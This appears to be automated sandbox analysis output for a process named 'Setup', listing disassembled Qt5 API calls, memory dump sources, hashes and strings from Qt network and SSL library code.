                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
• Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmp
• Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Meta$Array@@Byte$Type@$?normalized?registerFlag@Flags@Init_thread_footerNormalizedObject@@Object@@@TypeType@@Type@@@@
                                                                                                                                                              • String ID: QSslConfiguration
                                                                                                                                                              • API String ID: 109532953-1294908560
                                                                                                                                                              APIs
                                                                                                                                                              • ?normalizedType@QMetaObject@@SA?AVQByteArray@@PEBD@Z.QT5CORE(?,?,?,?,?,00007FFBA197318F), ref: 00007FFBA1978C63
                                                                                                                                                              • ?registerNormalizedType@QMetaType@@SAHAEBVQByteArray@@P6AXPEAX@ZP6APEAX1PEBX@ZHV?$QFlags@W4TypeFlag@QMetaType@@@@PEBUQMetaObject@@@Z.QT5CORE ref: 00007FFBA1978C97
                                                                                                                                                              • ??1QByteArray@@QEAA@XZ.QT5CORE ref: 00007FFBA1978CA4
                                                                                                                                                              • _Init_thread_footer.LIBCMT ref: 00007FFBA1978CDA
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
• Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmp
• Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Meta$Array@@Byte$Type@$?normalized?registerFlag@Flags@Init_thread_footerNormalizedObject@@Object@@@TypeType@@Type@@@@
                                                                                                                                                              • String ID: QSharedPointer<char>
                                                                                                                                                              • API String ID: 109532953-3318381151
                                                                                                                                                              APIs
                                                                                                                                                              • ?normalizedType@QMetaObject@@SA?AVQByteArray@@PEBD@Z.QT5CORE(?,?,?,?,00000000,00007FFBA19DDFEF), ref: 00007FFBA19DEBF3
                                                                                                                                                              • ?registerNormalizedType@QMetaType@@SAHAEBVQByteArray@@P6AXPEAX@ZP6APEAX1PEBX@ZHV?$QFlags@W4TypeFlag@QMetaType@@@@PEBUQMetaObject@@@Z.QT5CORE ref: 00007FFBA19DEC27
                                                                                                                                                              • ??1QByteArray@@QEAA@XZ.QT5CORE ref: 00007FFBA19DEC34
                                                                                                                                                              • _Init_thread_footer.LIBCMT ref: 00007FFBA19DEC6A
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
• Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmp
• Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Meta$Array@@Byte$Type@$?normalized?registerFlag@Flags@Init_thread_footerNormalizedObject@@Object@@@TypeType@@Type@@@@
                                                                                                                                                              • String ID: QNetworkSession::SessionError
                                                                                                                                                              • API String ID: 109532953-3125804625
                                                                                                                                                              APIs
                                                                                                                                                              • ?normalizedType@QMetaObject@@SA?AVQByteArray@@PEBD@Z.QT5CORE ref: 00007FFBA19E43C3
                                                                                                                                                              • ?registerNormalizedType@QMetaType@@SAHAEBVQByteArray@@P6AXPEAX@ZP6APEAX1PEBX@ZHV?$QFlags@W4TypeFlag@QMetaType@@@@PEBUQMetaObject@@@Z.QT5CORE(?,?,?,?,?,?,?,?,?,00007FFBA19E1478), ref: 00007FFBA19E43F7
                                                                                                                                                              • ??1QByteArray@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,?,?,00007FFBA19E1478), ref: 00007FFBA19E4404
                                                                                                                                                              • _Init_thread_footer.LIBCMT ref: 00007FFBA19E443A
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
• Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmp
• Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Meta$Array@@Byte$Type@$?normalized?registerFlag@Flags@Init_thread_footerNormalizedObject@@Object@@@TypeType@@Type@@@@
                                                                                                                                                              • String ID: QNetworkConfigurationPrivatePointer
                                                                                                                                                              • API String ID: 109532953-264861295
                                                                                                                                                              APIs
                                                                                                                                                              • ?normalizedType@QMetaObject@@SA?AVQByteArray@@PEBD@Z.QT5CORE(?,?,?,?,00000000,00007FFBA198DFC5), ref: 00007FFBA19903D3
                                                                                                                                                              • ?registerNormalizedType@QMetaType@@SAHAEBVQByteArray@@P6AXPEAX@ZP6APEAX1PEBX@ZHV?$QFlags@W4TypeFlag@QMetaType@@@@PEBUQMetaObject@@@Z.QT5CORE ref: 00007FFBA1990407
                                                                                                                                                              • ??1QByteArray@@QEAA@XZ.QT5CORE ref: 00007FFBA1990414
                                                                                                                                                              • _Init_thread_footer.LIBCMT ref: 00007FFBA199044A
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
• Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmp
• Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Meta$Array@@Byte$Type@$?normalized?registerFlag@Flags@Init_thread_footerNormalizedObject@@Object@@@TypeType@@Type@@@@
                                                                                                                                                              • String ID: QNetworkRequest::KnownHeaders
                                                                                                                                                              • API String ID: 109532953-1531910905
                                                                                                                                                              APIs
                                                                                                                                                              • ?normalizedType@QMetaObject@@SA?AVQByteArray@@PEBD@Z.QT5CORE(?,?,?,?,?,?,00007FFBA1973167), ref: 00007FFBA1979302
                                                                                                                                                              • ?registerNormalizedType@QMetaType@@SAHAEBVQByteArray@@P6AXPEAX@ZP6APEAX1PEBX@ZHV?$QFlags@W4TypeFlag@QMetaType@@@@PEBUQMetaObject@@@Z.QT5CORE ref: 00007FFBA197933D
                                                                                                                                                              • ??1QByteArray@@QEAA@XZ.QT5CORE ref: 00007FFBA197934A
                                                                                                                                                              • _Init_thread_footer.LIBCMT ref: 00007FFBA197938C
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Meta$Array@@Byte$Type@$?normalized?registerFlag@Flags@Init_thread_footerNormalizedObject@@Object@@@TypeType@@Type@@@@
                                                                                                                                                              • String ID: QNetworkReply::NetworkError
                                                                                                                                                              • API String ID: 109532953-3170863873
                                                                                                                                                              • Opcode ID: 0e7cd0cb06ec66cd6ca552a986537d4b5b919858c65a3a6fd380f8e526985165
                                                                                                                                                              • Instruction ID: 6e59375e623d434272e9c21dfde18e1fd3ef8b8c357b4eb5eae8789f76cb9e28
                                                                                                                                                              • Opcode Fuzzy Hash: 0e7cd0cb06ec66cd6ca552a986537d4b5b919858c65a3a6fd380f8e526985165
                                                                                                                                                              • Instruction Fuzzy Hash: D0213BB5A0EA82C6EB82DB24E8801A57760FF84B54F844036DE1D473A0EF7CE909CF04
                                                                                                                                                              APIs
                                                                                                                                                              • ?normalizedType@QMetaObject@@SA?AVQByteArray@@PEBD@Z.QT5CORE ref: 00007FFBA19DEB23
                                                                                                                                                              • ?registerNormalizedType@QMetaType@@SAHAEBVQByteArray@@P6AXPEAX@ZP6APEAX1PEBX@ZHV?$QFlags@W4TypeFlag@QMetaType@@@@PEBUQMetaObject@@@Z.QT5CORE(?,?,?,?,?,?,?,?,?,00007FFBA19E1473), ref: 00007FFBA19DEB57
                                                                                                                                                              • ??1QByteArray@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,?,?,00007FFBA19E1473), ref: 00007FFBA19DEB64
                                                                                                                                                              • _Init_thread_footer.LIBCMT ref: 00007FFBA19DEB9A
                                                                                                                                                              Strings
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Meta$Array@@Byte$Type@$?normalized?registerFlag@Flags@Init_thread_footerNormalizedObject@@Object@@@TypeType@@Type@@@@
                                                                                                                                                              • String ID: QNetworkConfiguration
                                                                                                                                                              • API String ID: 109532953-1564969325
                                                                                                                                                              • Opcode ID: a85197c5fa40f5c41f514cceb43437ceca8ca8b63a69dd35f53da858e681a29d
                                                                                                                                                              • Instruction ID: 5d2bc661a639bee8c3ebd7305aee39d5fba44c5c03a66ccb2b44e5f403b8e7c0
                                                                                                                                                              • Opcode Fuzzy Hash: a85197c5fa40f5c41f514cceb43437ceca8ca8b63a69dd35f53da858e681a29d
                                                                                                                                                              • Instruction Fuzzy Hash: 6811E4F5A0FA8292EB928B25E8941647760FF94764F804036DD6D822A4EF7CF949CF04
                                                                                                                                                              APIs
                                                                                                                                                              • ?normalizedType@QMetaObject@@SA?AVQByteArray@@PEBD@Z.QT5CORE(?,?,?,?,?,00007FFBA197316C), ref: 00007FFBA1978ED3
                                                                                                                                                              • ?registerNormalizedType@QMetaType@@SAHAEBVQByteArray@@P6AXPEAX@ZP6APEAX1PEBX@ZHV?$QFlags@W4TypeFlag@QMetaType@@@@PEBUQMetaObject@@@Z.QT5CORE ref: 00007FFBA1978F07
                                                                                                                                                              • ??1QByteArray@@QEAA@XZ.QT5CORE ref: 00007FFBA1978F14
                                                                                                                                                              • _Init_thread_footer.LIBCMT ref: 00007FFBA1978F4A
                                                                                                                                                              Strings
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Meta$Array@@Byte$Type@$?normalized?registerFlag@Flags@Init_thread_footerNormalizedObject@@Object@@@TypeType@@Type@@@@
                                                                                                                                                              • String ID: QNetworkProxy
                                                                                                                                                              • API String ID: 109532953-742907959
                                                                                                                                                              • Opcode ID: ee872f6c5f894b135f12777b3e556cd9ce65d6f8be10134703e03a9ba506a5a2
                                                                                                                                                              • Instruction ID: 9b9eb04378f4fb10d8fe7e6eee80cc68005ec20f4cdd9795cfa06ca1936cb5f4
                                                                                                                                                              • Opcode Fuzzy Hash: ee872f6c5f894b135f12777b3e556cd9ce65d6f8be10134703e03a9ba506a5a2
                                                                                                                                                              • Instruction Fuzzy Hash: 2611E7B5A0E642C2FB92DB34E8455656761FF54754F80453ADD5E422A0EF3CE949CF00
                                                                                                                                                              APIs
                                                                                                                                                              • ?normalizedType@QMetaObject@@SA?AVQByteArray@@PEBD@Z.QT5CORE(?,?,?,?,00000000,00007FFBA1980357), ref: 00007FFBA1978E03
                                                                                                                                                              • ?registerNormalizedType@QMetaType@@SAHAEBVQByteArray@@P6AXPEAX@ZP6APEAX1PEBX@ZHV?$QFlags@W4TypeFlag@QMetaType@@@@PEBUQMetaObject@@@Z.QT5CORE ref: 00007FFBA1978E37
                                                                                                                                                              • ??1QByteArray@@QEAA@XZ.QT5CORE ref: 00007FFBA1978E44
                                                                                                                                                              • _Init_thread_footer.LIBCMT ref: 00007FFBA1978E7A
                                                                                                                                                              Strings
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Meta$Array@@Byte$Type@$?normalized?registerFlag@Flags@Init_thread_footerNormalizedObject@@Object@@@TypeType@@Type@@@@
                                                                                                                                                              • String ID: QNetworkCookie
                                                                                                                                                              • API String ID: 109532953-517715147
                                                                                                                                                              • Opcode ID: 17faeb1464f95e40b027a67942841708b1ee0165e08525d6ec01e8dc8f7ec80a
                                                                                                                                                              • Instruction ID: 6b2693b8ac36a376c43069ca33cc6ce3a6c36ea61a18818c75d037b483744118
                                                                                                                                                              • Opcode Fuzzy Hash: 17faeb1464f95e40b027a67942841708b1ee0165e08525d6ec01e8dc8f7ec80a
                                                                                                                                                              • Instruction Fuzzy Hash: C21117A5A0E6828AEB928B24E84016A7760FF54754F80443ADD2D463A0EF3CE909CF00
                                                                                                                                                              APIs
                                                                                                                                                              • ?normalizedType@QMetaObject@@SA?AVQByteArray@@PEBD@Z.QT5CORE(?,?,?,?,?,00007FFBA1973185), ref: 00007FFBA1978D33
                                                                                                                                                              • ?registerNormalizedType@QMetaType@@SAHAEBVQByteArray@@P6AXPEAX@ZP6APEAX1PEBX@ZHV?$QFlags@W4TypeFlag@QMetaType@@@@PEBUQMetaObject@@@Z.QT5CORE ref: 00007FFBA1978D67
                                                                                                                                                              • ??1QByteArray@@QEAA@XZ.QT5CORE ref: 00007FFBA1978D74
                                                                                                                                                              • _Init_thread_footer.LIBCMT ref: 00007FFBA1978DAA
                                                                                                                                                              Strings
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Meta$Array@@Byte$Type@$?normalized?registerFlag@Flags@Init_thread_footerNormalizedObject@@Object@@@TypeType@@Type@@@@
                                                                                                                                                              • String ID: QHttpNetworkRequest
                                                                                                                                                              • API String ID: 109532953-2535381774
                                                                                                                                                              • Opcode ID: 87b4075cabd289e24a2b0f853764db53599853b9afae09752e41cbe620bcbc6a
                                                                                                                                                              • Instruction ID: acf936595c6c7c7d01a03f3afc1b3b39f383bc5887743fdccf21f7fdb0dd5c30
                                                                                                                                                              • Opcode Fuzzy Hash: 87b4075cabd289e24a2b0f853764db53599853b9afae09752e41cbe620bcbc6a
                                                                                                                                                              • Instruction Fuzzy Hash: 30112CF5A0E6829AE7928F34E8901AA3760FF54754F944036DD1D872A0EF7CE949CF04
                                                                                                                                                              APIs
                                                                                                                                                              • ?normalizedType@QMetaObject@@SA?AVQByteArray@@PEBD@Z.QT5CORE ref: 00007FFBA1979073
                                                                                                                                                              • ?registerNormalizedType@QMetaType@@SAHAEBVQByteArray@@P6AXPEAX@ZP6APEAX1PEBX@ZHV?$QFlags@W4TypeFlag@QMetaType@@@@PEBUQMetaObject@@@Z.QT5CORE ref: 00007FFBA19790A7
                                                                                                                                                              • ??1QByteArray@@QEAA@XZ.QT5CORE ref: 00007FFBA19790B4
                                                                                                                                                              • _Init_thread_footer.LIBCMT ref: 00007FFBA19790EA
                                                                                                                                                              Strings
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Meta$Array@@Byte$Type@$?normalized?registerFlag@Flags@Init_thread_footerNormalizedObject@@Object@@@TypeType@@Type@@@@
                                                                                                                                                              • String ID: QtMetaTypePrivate::QSequentialIterableImpl
                                                                                                                                                              • API String ID: 109532953-4023160101
                                                                                                                                                              • Opcode ID: 225c0ffc10f25ced4f1a40a7590b0a093180c3d9cebfb46a50617f76a3753e06
                                                                                                                                                              • Instruction ID: d88ec12dc9adb9d650aea7713727a52f90bc66ef0a6cd3c47297d4172e01fbd5
                                                                                                                                                              • Opcode Fuzzy Hash: 225c0ffc10f25ced4f1a40a7590b0a093180c3d9cebfb46a50617f76a3753e06
                                                                                                                                                              • Instruction Fuzzy Hash: 9F11E7A5E0E6428AEB928F39E8401A56761FF55764F80413ADD2D472A0EF3CE949CF04
                                                                                                                                                              APIs
                                                                                                                                                              • ?normalizedType@QMetaObject@@SA?AVQByteArray@@PEBD@Z.QT5CORE(?,?,?,?,00000000,00007FFBA198412A), ref: 00007FFBA19868C3
                                                                                                                                                              • ?registerNormalizedType@QMetaType@@SAHAEBVQByteArray@@P6AXPEAX@ZP6APEAX1PEBX@ZHV?$QFlags@W4TypeFlag@QMetaType@@@@PEBUQMetaObject@@@Z.QT5CORE ref: 00007FFBA19868F7
                                                                                                                                                              • ??1QByteArray@@QEAA@XZ.QT5CORE ref: 00007FFBA1986904
                                                                                                                                                              • _Init_thread_footer.LIBCMT ref: 00007FFBA198693A
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Meta$Array@@Byte$Type@$?normalized?registerFlag@Flags@Init_thread_footerNormalizedObject@@Object@@@TypeType@@Type@@@@
                                                                                                                                                              • String ID: QNetworkRequest
                                                                                                                                                              APIs
                                                                                                                                                              • ?normalizedType@QMetaObject@@SA?AVQByteArray@@PEBD@Z.QT5CORE(?,?,?,?,00000000,00007FFBA19DDFEA), ref: 00007FFBA198C0D3
                                                                                                                                                              • ?registerNormalizedType@QMetaType@@SAHAEBVQByteArray@@P6AXPEAX@ZP6APEAX1PEBX@ZHV?$QFlags@W4TypeFlag@QMetaType@@@@PEBUQMetaObject@@@Z.QT5CORE ref: 00007FFBA198C107
                                                                                                                                                              • ??1QByteArray@@QEAA@XZ.QT5CORE ref: 00007FFBA198C114
                                                                                                                                                              • _Init_thread_footer.LIBCMT ref: 00007FFBA198C14A
                                                                                                                                                              Strings
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Meta$Array@@Byte$Type@$?normalized?registerFlag@Flags@Init_thread_footerNormalizedObject@@Object@@@TypeType@@Type@@@@
                                                                                                                                                              • String ID: QNetworkSession::State
                                                                                                                                                              APIs
                                                                                                                                                              • ?normalizedType@QMetaObject@@SA?AVQByteArray@@PEBD@Z.QT5CORE(?,?,?,?,00000000,00007FFBA19DDFF4), ref: 00007FFBA198C003
                                                                                                                                                              • ?registerNormalizedType@QMetaType@@SAHAEBVQByteArray@@P6AXPEAX@ZP6APEAX1PEBX@ZHV?$QFlags@W4TypeFlag@QMetaType@@@@PEBUQMetaObject@@@Z.QT5CORE ref: 00007FFBA198C037
                                                                                                                                                              • ??1QByteArray@@QEAA@XZ.QT5CORE ref: 00007FFBA198C044
                                                                                                                                                              • _Init_thread_footer.LIBCMT ref: 00007FFBA198C07A
                                                                                                                                                              Strings
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Meta$Array@@Byte$Type@$?normalized?registerFlag@Flags@Init_thread_footerNormalizedObject@@Object@@@TypeType@@Type@@@@
                                                                                                                                                              • String ID: QNetworkSession::UsagePolicies
                                                                                                                                                              APIs
                                                                                                                                                              • ?isWarningEnabled@QLoggingCategory@@QEBA_NXZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1A45996), ref: 00007FFBA1A34A38
                                                                                                                                                                • Part of subcall function 00007FFBA1A1E9F0: ??0QLoggingCategory@@QEAA@PEBD@Z.QT5CORE(?,?,?,00007FFBA1A36395,?,?,?,?,?,?,?,?,?,?,00007FFBA1A3C7A1), ref: 00007FFBA1A1EA4C
                                                                                                                                                                • Part of subcall function 00007FFBA1A1E9F0: _Init_thread_footer.LIBCMT ref: 00007FFBA1A1EA65
                                                                                                                                                              • ??0QMessageLogger@@QEAA@PEBDH00@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1A45996), ref: 00007FFBA1A34A5D
                                                                                                                                                              • ?warning@QMessageLogger@@QEBAXPEBDZZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1A45996), ref: 00007FFBA1A34A74
                                                                                                                                                              Strings
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Category@@Logger@@LoggingMessage$?warning@Enabled@H00@Init_thread_footerWarning
                                                                                                                                                              • String ID: QSslSocket: cannot call unresolved function %s$SSL_free
                                                                                                                                                              APIs
                                                                                                                                                              • ?isWarningEnabled@QLoggingCategory@@QEBA_NXZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1A40892,?,?,FFFFFFFF,00007FFBA1A24823), ref: 00007FFBA1A33998
                                                                                                                                                                • Part of subcall function 00007FFBA1A1E9F0: ??0QLoggingCategory@@QEAA@PEBD@Z.QT5CORE(?,?,?,00007FFBA1A36395,?,?,?,?,?,?,?,?,?,?,00007FFBA1A3C7A1), ref: 00007FFBA1A1EA4C
                                                                                                                                                                • Part of subcall function 00007FFBA1A1E9F0: _Init_thread_footer.LIBCMT ref: 00007FFBA1A1EA65
                                                                                                                                                              • ??0QMessageLogger@@QEAA@PEBDH00@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1A40892,?,?,FFFFFFFF,00007FFBA1A24823), ref: 00007FFBA1A339BD
                                                                                                                                                              • ?warning@QMessageLogger@@QEBAXPEBDZZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1A40892,?,?,FFFFFFFF,00007FFBA1A24823), ref: 00007FFBA1A339D4
                                                                                                                                                              Strings
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Category@@Logger@@LoggingMessage$?warning@Enabled@H00@Init_thread_footerWarning
                                                                                                                                                              • String ID: QSslSocket: cannot call unresolved function %s$RSA_free
                                                                                                                                                              APIs
                                                                                                                                                              • ?isWarningEnabled@QLoggingCategory@@QEBA_NXZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1A40F8D), ref: 00007FFBA1A31BD8
                                                                                                                                                                • Part of subcall function 00007FFBA1A1E9F0: ??0QLoggingCategory@@QEAA@PEBD@Z.QT5CORE(?,?,?,00007FFBA1A36395,?,?,?,?,?,?,?,?,?,?,00007FFBA1A3C7A1), ref: 00007FFBA1A1EA4C
                                                                                                                                                                • Part of subcall function 00007FFBA1A1E9F0: _Init_thread_footer.LIBCMT ref: 00007FFBA1A1EA65
                                                                                                                                                              • ??0QMessageLogger@@QEAA@PEBDH00@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1A40F8D), ref: 00007FFBA1A31BFD
                                                                                                                                                              • ?warning@QMessageLogger@@QEBAXPEBDZZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1A40F8D), ref: 00007FFBA1A31C14
                                                                                                                                                              Strings
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Category@@Logger@@LoggingMessage$?warning@Enabled@H00@Init_thread_footerWarning
                                                                                                                                                              • String ID: EVP_PKEY_free$QSslSocket: cannot call unresolved function %s
                                                                                                                                                              • API String ID: 646154281-955281867
                                                                                                                                                              APIs
                                                                                                                                                              • ?isWarningEnabled@QLoggingCategory@@QEBA_NXZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1A3EF44), ref: 00007FFBA1A32DC8
                                                                                                                                                                • Part of subcall function 00007FFBA1A1E9F0: ??0QLoggingCategory@@QEAA@PEBD@Z.QT5CORE(?,?,?,00007FFBA1A36395,?,?,?,?,?,?,?,?,?,?,00007FFBA1A3C7A1), ref: 00007FFBA1A1EA4C
                                                                                                                                                                • Part of subcall function 00007FFBA1A1E9F0: _Init_thread_footer.LIBCMT ref: 00007FFBA1A1EA65
                                                                                                                                                              • ??0QMessageLogger@@QEAA@PEBDH00@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1A3EF44), ref: 00007FFBA1A32DED
                                                                                                                                                              • ?warning@QMessageLogger@@QEBAXPEBDZZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1A3EF44), ref: 00007FFBA1A32E04
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Category@@Logger@@LoggingMessage$?warning@Enabled@H00@Init_thread_footerWarning
                                                                                                                                                              • String ID: OPENSSL_sk_pop_free$QSslSocket: cannot call unresolved function %s
                                                                                                                                                              • API String ID: 646154281-1327355536
                                                                                                                                                              APIs
                                                                                                                                                              • ?isWarningEnabled@QLoggingCategory@@QEBA_NXZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1A408B1,?,?,FFFFFFFF,00007FFBA1A24823), ref: 00007FFBA1A31628
                                                                                                                                                                • Part of subcall function 00007FFBA1A1E9F0: ??0QLoggingCategory@@QEAA@PEBD@Z.QT5CORE(?,?,?,00007FFBA1A36395,?,?,?,?,?,?,?,?,?,?,00007FFBA1A3C7A1), ref: 00007FFBA1A1EA4C
                                                                                                                                                                • Part of subcall function 00007FFBA1A1E9F0: _Init_thread_footer.LIBCMT ref: 00007FFBA1A1EA65
                                                                                                                                                              • ??0QMessageLogger@@QEAA@PEBDH00@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1A408B1,?,?,FFFFFFFF,00007FFBA1A24823), ref: 00007FFBA1A3164D
                                                                                                                                                              • ?warning@QMessageLogger@@QEBAXPEBDZZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1A408B1,?,?,FFFFFFFF,00007FFBA1A24823), ref: 00007FFBA1A31664
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Category@@Logger@@LoggingMessage$?warning@Enabled@H00@Init_thread_footerWarning
                                                                                                                                                              • String ID: DSA_free$QSslSocket: cannot call unresolved function %s
                                                                                                                                                              • API String ID: 646154281-3554305600
                                                                                                                                                              APIs
